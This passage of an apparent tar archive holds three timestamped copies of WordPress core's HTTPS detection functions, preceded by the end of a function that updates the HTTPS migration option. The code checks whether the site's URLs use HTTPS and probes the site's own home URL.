* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605080452-20260621081114.php 0000666 00000013341 15224151221 0013340 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605070331.php 0000666 00000013341 15224151221 0011754 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606132425.php 0000666 00000013341 15224151221 0011760 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}